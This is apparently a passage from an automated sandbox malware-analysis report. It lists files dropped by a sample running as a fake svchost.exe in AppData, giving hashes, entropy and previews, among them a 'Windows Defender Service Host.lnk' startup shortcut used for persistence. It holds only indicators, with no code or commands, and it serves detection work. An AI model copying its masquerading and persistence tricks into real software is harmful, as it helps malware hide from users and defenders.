                                                  SHA-512:BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
                                                  Malicious:false
                                                  Preview:OneDrive\...desktop.ini..
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):88
                                                  Entropy (8bit):4.450045114302317
                                                  Encrypted:false
                                                  SSDEEP:3:YzIVqIPLKmwHW8LKKrLKB:nqyLKmYNLKCLKB
                                                  MD5:D430E8A326E3D75F5E49C40C111646E7
                                                  SHA1:D8F2494185D04AB9954CD78268E65410768F6226
                                                  SHA-256:22A45B5ECD9B66441AE7A7AB161C280B6606F920A6A6C25CD7B9C2D4CEB3254D
                                                  SHA-512:1E8139844D02A3009EE89E2DC33CF9ED79E988867974B1291ABA8BC26C30CB952F10E88E0F44A4AEEE162A27E71EAA331CF8AC982B4179DC8203F6F7280BA5AE
                                                  Malicious:false
                                                  Preview:Pictures\...Camera Roll\....desktop.ini...Saved Pictures\....desktop.ini...desktop.ini..
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.5269908036173305
                                                  Encrypted:false
                                                  SSDEEP:3:jgBLKSyA7V2AXAHKMJDv:j4LKSyA7VEKMJz
                                                  MD5:962BA2F38107171F546032264F2B3A87
                                                  SHA1:E6836B31DF2F3DE53E5534714D5142ED784ED4B4
                                                  SHA-256:87ECB05FFD7E3140524EAC373C7DD948030312DCFE2AA2B1B6ED9ED82A644EFA
                                                  SHA-512:01CE72E1DC2E9FA0F9A79C873885738114B842E92789AE7A4C9474894CAF7F5A86B1AC5F4B5D02D3F240B9D4921E2A89E85D14CB8A39D0FAE4F771F03573AE71
                                                  Malicious:false
                                                  Preview:Startup\...desktop.ini...Windows Defender Service Host.lnk..
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):4403
                                                  Entropy (8bit):5.190546922929315
                                                  Encrypted:false
                                                  SSDEEP:96:4tiCKcwGT+jDM9Zw72fSASbSbdbsuEMnI0kjMC1GA03MjssMaLTjg/uZ9FGVpd0q:LYfa2fSASOpgu9nI0kjMC1GA08As5vLs
                                                  MD5:57F2274700E72465206D8890E8E1E8CF
                                                  SHA1:CE7893A55E77079654F4746DBEBED5C089DEB55D
                                                  SHA-256:6E03DB17AA0B035022980F9EDE70F34AC3C7D653C275571B2B2F42C174AA8153
                                                  SHA-512:C2EC4CD2B55F2915CE1764CE8A34A831A6173ED89F82CFC1ECFCA41BF2C092212DD8E2818B3DDC1BBD099D31CBF467FF179D4EDC71EB904CC053E65735EA5BDB
                                                  Malicious:false
                                                  Preview:Temp\...acrobat_sbx\....Adobe\.....Acrobat\......DC\....NGL\.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 16-15-42-624.log.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 16-15-55-956.log.....NGLClient_AcrobatReader123.6.20320.6.log....acroNGLLog.txt...acrocef_low\...acrord32_super_sbx\....Adobe\.....Acrobat\......DC\.......SearchEmbdIndex\...Diagnostics\....EXCEL\.....App1696428505298658900_7B05BF2A-C74F-44F8-B674-AA3F9719008B.log.....App1696428527628431800_6CD9E3BB-4D03-46BD-8615-75A902267162.log.....App1696428537364279100_A2018481-B961-46B4-9328-34939DEAF293.log.....App1696428537364768600_A2018481-B961-46B4-9328-34939DEAF293.log...edge_BITS_6440_1090636871\....4643befd-79b8-4e0c-a2fb-c0e3ee78dcd5...edge_BITS_6440_1191663050\....9e51170b-7adf-40ab-83b6-5f97b13bedcb...edge_BITS_6440_1234978473\....1187695d-8276-4e31-8de1-9e57768989bd...edge_BITS_6440_1289371347\....78549187-a875-4f1e-8dfa-9938ebc29c81...edge_BITS_6440_1318414972\....873489b1-33b2-480a-baa2-641b9e09edcd...ed
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):23
                                                  Entropy (8bit):3.7950885863977324
                                                  Encrypted:false
                                                  SSDEEP:3:k+JrLKB:k+JrLKB
                                                  MD5:1FDDBF1169B6C75898B86E7E24BC7C1F
                                                  SHA1:D2091060CB5191FF70EB99C0088C182E80C20F8C
                                                  SHA-256:A67AA329B7D878DE61671E18CD2F4B011D11CBAC67EA779818C6DAFAD2D70733
                                                  SHA-512:20BFEAFDE7FEC1753FEF59DE467BD4A3DD7FE627E8C44E95FE62B065A5768C4508E886EC5D898E911A28CF6365F455C9AB1EBE2386D17A76F53037F99061FD4D
                                                  Malicious:false
                                                  Preview:Videos\...desktop.ini..
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.704346314649071
                                                  Encrypted:false
                                                  SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                  MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                  SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                  SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                  SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                  Malicious:false
                                                  Preview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
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.690299109915258
                                                  Encrypted:false
                                                  SSDEEP:24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
                                                  MD5:F0D9DE697149ECBC1D88C7EA4841E5BD
                                                  SHA1:06A2A47C12B3554397AA0C8F483411CAB366947D
                                                  SHA-256:5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
                                                  SHA-512:E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
                                                  Malicious:false
                                                  Preview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
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.704346314649071
                                                  Encrypted:false
                                                  SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                  MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                  SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                  SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                  SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                  Malicious:true
                                                  Preview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
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.690299109915258
                                                  Encrypted:false
                                                  SSDEEP:24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
                                                  MD5:F0D9DE697149ECBC1D88C7EA4841E5BD
                                                  SHA1:06A2A47C12B3554397AA0C8F483411CAB366947D
                                                  SHA-256:5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
                                                  SHA-512:E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
                                                  Malicious:false
                                                  Preview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
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696178193607948
                                                  Encrypted:false
                                                  SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                  MD5:960ECA5919CC00E1B4542A6E039F413E
                                                  SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                  SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                  SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                  Malicious:false
                                                  Preview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
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.697358951122591
                                                  Encrypted:false
                                                  SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                  MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                  SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                  SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                  SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                  Malicious:false
                                                  Preview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
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6998645060098685
                                                  Encrypted:false
                                                  SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                  MD5:1676F91570425F6566A5746BC8E8427E
                                                  SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                  SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                  SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                  Malicious:false
                                                  Preview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
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696178193607948
                                                  Encrypted:false
                                                  SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                  MD5:960ECA5919CC00E1B4542A6E039F413E
                                                  SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                  SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                  SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                  Malicious:false
                                                  Preview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
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696178193607948
                                                  Encrypted:false
                                                  SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                  MD5:960ECA5919CC00E1B4542A6E039F413E
                                                  SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                  SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                  SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                  Malicious:false
                                                  Preview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
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696178193607948
                                                  Encrypted:false
                                                  SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                  MD5:960ECA5919CC00E1B4542A6E039F413E
                                                  SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                  SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                  SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                  Malicious:false
                                                  Preview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
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.7020597455120665
                                                  Encrypted:false
                                                  SSDEEP:24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
                                                  MD5:47F4925C44B6916FE1BEE7FBB1ACF777
                                                  SHA1:D7BFAEF09A15A105540FC44D2C307778C0553CE5
                                                  SHA-256:62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
                                                  SHA-512:6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
                                                  Malicious:false
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.687055908915499
                                                  Encrypted:false
                                                  SSDEEP:24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
                                                  MD5:94EDB575C55407C555A3F710DF2A8CB3
                                                  SHA1:3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
                                                  SHA-256:DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
                                                  SHA-512:F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
                                                  Malicious:false
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696508269038202
                                                  Encrypted:false
                                                  SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                  MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                  SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                  SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                  SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                  Malicious:true
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6959554225029665
                                                  Encrypted:false
                                                  SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                  MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                  SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                  SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                  SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                  Malicious:false
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.692024230831571
                                                  Encrypted:false
                                                  SSDEEP:24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
                                                  MD5:086908C2D2FAA8C9284EAB6D70682A47
                                                  SHA1:1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
                                                  SHA-256:40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
                                                  SHA-512:02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
                                                  Malicious:false
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.692990330209164
                                                  Encrypted:false
                                                  SSDEEP:24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
                                                  MD5:DD71B9C0322AD45992E56A9BCE43FE82
                                                  SHA1:60945B6BC3027451A2E1CFA29D263A994F50E91A
                                                  SHA-256:19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
                                                  SHA-512:86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
                                                  Malicious:false
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.7020597455120665
                                                  Encrypted:false
                                                  SSDEEP:24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
                                                  MD5:47F4925C44B6916FE1BEE7FBB1ACF777
                                                  SHA1:D7BFAEF09A15A105540FC44D2C307778C0553CE5
                                                  SHA-256:62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
                                                  SHA-512:6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
                                                  Malicious:true
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.697358951122591
                                                  Encrypted:false
                                                  SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                  MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                  SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                  SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                  SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                  Malicious:false
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.697358951122591
                                                  Encrypted:false
                                                  SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                  MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                  SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                  SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                  SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                  Malicious:false
                                                  Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.687055908915499
                                                  Encrypted:false
                                                  SSDEEP:24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
                                                  MD5:94EDB575C55407C555A3F710DF2A8CB3
                                                  SHA1:3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
                                                  SHA-256:DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
                                                  SHA-512:F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
                                                  Malicious:false
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6998645060098685
                                                  Encrypted:false
                                                  SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                  MD5:1676F91570425F6566A5746BC8E8427E
                                                  SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                  SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                  SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                  Malicious:true
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6998645060098685
                                                  Encrypted:false
                                                  SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                  MD5:1676F91570425F6566A5746BC8E8427E
                                                  SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                  SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                  SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                  Malicious:true
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.692024230831571
                                                  Encrypted:false
                                                  SSDEEP:24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
                                                  MD5:086908C2D2FAA8C9284EAB6D70682A47
                                                  SHA1:1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
                                                  SHA-256:40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
                                                  SHA-512:02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
                                                  Malicious:false
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.692990330209164
                                                  Encrypted:false
                                                  SSDEEP:24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
                                                  MD5:DD71B9C0322AD45992E56A9BCE43FE82
                                                  SHA1:60945B6BC3027451A2E1CFA29D263A994F50E91A
                                                  SHA-256:19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
                                                  SHA-512:86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
                                                  Malicious:false
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.697358951122591
                                                  Encrypted:false
                                                  SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                  MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                  SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                  SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                  SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                  Malicious:false
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6998645060098685
                                                  Encrypted:false
                                                  SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                  MD5:1676F91570425F6566A5746BC8E8427E
                                                  SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                  SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                  SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                  Malicious:false
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696508269038202
                                                  Encrypted:false
